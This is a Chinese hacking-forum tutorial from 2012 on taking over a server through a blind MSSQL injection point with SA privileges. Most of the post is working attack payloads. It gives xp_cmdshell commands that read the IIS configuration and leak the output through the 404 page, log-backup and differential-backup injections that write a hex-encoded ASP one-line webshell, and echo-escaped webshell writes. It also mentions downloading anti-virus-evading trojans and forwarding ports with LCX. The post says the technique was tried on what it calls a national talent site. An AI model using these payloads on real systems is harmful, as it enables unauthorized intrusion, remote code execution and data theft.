找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2575|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
' ]3 T7 R, t  L/ g* ~5 q' D" F# U+ m2 I/ F- B. ?7 h1 B! m* |5 _
' n% |, d& P: [) ^4 a
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
  _$ q) X, D$ B1 s# v6 W- W' }7 ?3 P3 Y1 T# i2 P7 F9 H7 l
                                                                 
/ X/ o1 [$ a: s4 D* _                                                                 
, |. P& H: \+ `" ^0 [/ X                                                                  论坛: http://www.90team.net/
4 B  `! c: F, _4 J7 S) @3 F( Z7 y- ^" M. q4 S( }
5 p2 {/ S1 U' A+ L) E' I
$ H) C" A' b, Z  L$ N, `+ e) T' H
友情检测国家人才网! a2 f: _3 e/ G( f

7 z" `& D6 B4 o/ ]+ O1 S& D
& [7 w% @, `6 j  [$ i内容:MSSQL注入SA权限不显错模式下的入侵
- P% x$ ^6 G: T7 n% u; i* {( z
1 Z, W7 @1 B" y  \8 j: H) H7 I9 n  J$ u
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
: R3 `/ H' E* ?# B! @
" F' S4 Y% k+ s, J/ m1 W我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。; |0 y1 a/ @, J! \  H/ x8 h

' k7 Z$ W$ b, f' l& L) e, r& |2 ^* X! M& Z) g
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
& H2 k$ G# t, h# E% e& J/ K4 f
3 S6 C" I  d8 C思路:' n2 q& z) C% K( r

( N% s" X- L& o首先:7 x- Q9 P; ^* G- f- D! F+ s

/ o# z4 [; _, H0 Y通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。4 X5 Y0 [) R0 s( v" o+ j! D7 q
7 ^' T5 R  ~. H2 y
1.日志备份获得Webshell
/ M; h. ]' q2 i3 l& p8 x% N" G% g. n
2.数据库差异备份获得Webshell/ H1 o( n. J: _8 x* @+ z

( G0 o3 B; u1 @7 z1 ?0 A4.直接下载免杀远控木马。: G6 u$ @- ?! H% t9 T6 G

7 ]# E3 l$ @7 F$ [" k5.直接下载LCX将服务器端口转发出来
4 T+ h: e8 _6 G. n- V5 R3 @) N& A: j, z
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
' k# n- m0 ?3 Y5 P1 X
0 h+ U% }: I% m+ e" M0 w" o6 U% |. Q3 Y7 u8 O- v

" e: o8 ^& U9 r" R在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
. S: r2 f; e$ C" n3 i4 H0 l
) \2 d% G3 {4 A: {我直接演示后面一个方法2 V% h7 q# |) Q$ ?. e
0 M! @, o1 K- [& `4 M7 A

9 _4 m  W" F6 [0 q分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
- e* s" J* B! l  U+ K0 v$ j. d1 p+ k* K6 e9 X5 {: {
# M- w8 C  ~1 X) y6 o9 j
$ v( @5 x% X! I; S9 p/ @, ^

! F# K+ y$ Y9 d  k, e/ S◆日志备份:- O; C% f. W6 I7 G* b! ~
7 G3 I! u) F! @. b9 Z
" y4 @( q( u  O: M1 X' g; P6 [
1. 进行初始备份6 }9 }- j2 b: r
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--3 l  w, z! P! S; c7 a$ _
# i  c; H1 }  e4 n1 s2 s+ J# v
2. 插入数据; N1 k: @% Z9 @3 S
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--* b* j: v. e3 y3 w2 F
0 m$ F5 ]/ y& ~( ?
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
9 f& W  y* _  U4 M1 O  
- g/ T7 C- y. C* U3. 备份并获得文件,删除临时表& b8 Q# H2 a5 w, Q  A6 s5 |0 ?$ J: h
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
; i& g& Y: e$ e- e7 S, ~6 t
. y8 G7 G% c9 Q) J$ c. r% C1 R5 }. U$ e% |  Z$ Z

2 N; r6 X% J3 ^◆数据库差异备份
) W: ^* N' m, m3 _; k
8 K3 R: R5 q1 R. {(1. 进行差异备份准备工作
( Q/ L. P" I; C, ]- N; ?- m' B5 ^3 j) I8 i/ q; j
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--0 `5 l, ?( o3 x

- ?( w9 k, X+ _上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码2 z' W$ F4 @$ g# x* x4 c! b

1 B7 C, h. _0 h- P* ]7 |, K5 C9 V6 ]
(2. 将数据写入到数据库; A0 |: h8 v# w+ n
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 2 @6 U  O9 x8 V+ Q4 H9 z
! r1 j7 x1 _, Z7 S
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
' ]; i- g$ x4 A- T$ R1 @; j- M* J9 D
3. 备份数据库并清理临时文件
! T' K$ |7 U7 u. W% _8 J2 N( c6 x( s6 S' ]& T4 I6 p* d1 N2 f* U
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
% h- k; t% M1 K9 {/ [
# p1 L' O4 j3 n5 ~3 P7 C0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
3 m' q9 P1 x; q4 @" X9 O& I1 N( M: O" I

" Y7 k' W" S4 Q. f0 y$ @% Q' d% p* c2 y% W+ d5 j
用^转义字符来写ASP(一句话木马)文件的方法:   
; i0 G+ f  o1 I) C8 o6 b7 P1 q8 q$ z" D
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--$ @. {6 u: e6 B+ e, X
, q8 o6 Y7 Q4 t' c  m4 j
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
! w' v4 W' |: J: b( c7 {: L. {% n  C- U0 ]! }% n
读取IIS配置信息获取web路径
4 V4 z' ?- Q, H, w! v9 K# Q5 ~! @: e6 g& G1 [( X4 J8 i# _8 x& n
     
4 A, V8 @/ `/ f1 X3 o     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
0 k  M! F6 F  }- F& {
: ^* R7 K& D% ~8 g+ z; w3 V9 }5 ?+ n执行命令( `" ?  K: ~' u) x
     
8 _6 h, y  |5 W& B& c     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--) i0 n4 l4 T/ k  C, w' D5 T
3 S1 C2 j7 ~5 B; J% b
/ y, w- A+ ~. t5 ?6 Z8 E' o

/ _9 c2 H9 {, w+ p; E" I  ~
# i7 g, V  q0 _1 A( u$ [: ^( E) ^+ m  V. ?

: J/ D2 h; o+ i, n5 R! z- X5 ]4 u& e( }9 x. M: V
( f3 }5 E2 `$ X6 R

! k, F, k9 @( a4 u4 F3 @, T4 l' K1 K; r

3 ^* H7 q2 n7 \6 ~0 N" s. m: p( I1 V

3 @) @4 N% W' x& x3 ?5 Y; G# m$ }- m) n( b( L7 H

% {6 Z0 ?; M0 ~. A. o2 b4 z8 o6 x" r
7 v; O# }1 \8 F

( I$ R9 M! o0 o3 ]9 _; `% g  P5 g; q
4 o4 f1 T+ {0 l, `0 s7 {; i9 K0 U( N

- @/ j, V1 L9 H- r. ~: ?( v& M9 Q3 h

3 [$ X# U% h8 T* c; P+ ]4 }% `2 ?9 Q2 Y& V6 I: h
7 b# P! a7 O2 a( w3 \+ _

: ]0 y1 s+ }. X& a, S+ M+ m* o( a& D6 k6 a% v) k  Q$ x
5 m* j; n! P1 p, [+ n6 x. U
9 T# p: {" ^6 ~, Q( E! X

5 _) J6 k) C- X. S1 Q, R2 u3 y/ d6 z! x' A

/ C7 Q4 g/ R9 t; w7 [3 ~
  i) l/ Z0 U. ~+ y( w4 G" U+ |
+ S2 s! v& m0 u8 E9 D! o# U+ ~0 f& F) D- _3 z, H  Y# u$ }# C
" U9 o8 l2 p! ~8 N2 l; E8 {8 ?
* e0 A; g" y' B
/ T& E) k( h6 k9 I

4 ~' p( f2 `' S, j% L+ Z/ B4 x" Z5 [, N* ]; z; `$ b

# ]% c4 w3 r  j) f5 B4 K2 C1 _1 D' g5 h. @; r

; P9 u+ q5 Q2 ^  ~( J% F4 `, ], H9 j% k; j7 l+ o2 ]3 c
% q# e1 I# W# e0 p% c3 T2 I
7 k3 Y% W- M2 V" {$ u+ @

9 N  V) X9 m. B7 a" X3 Z# a! ?) Y9 _5 ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表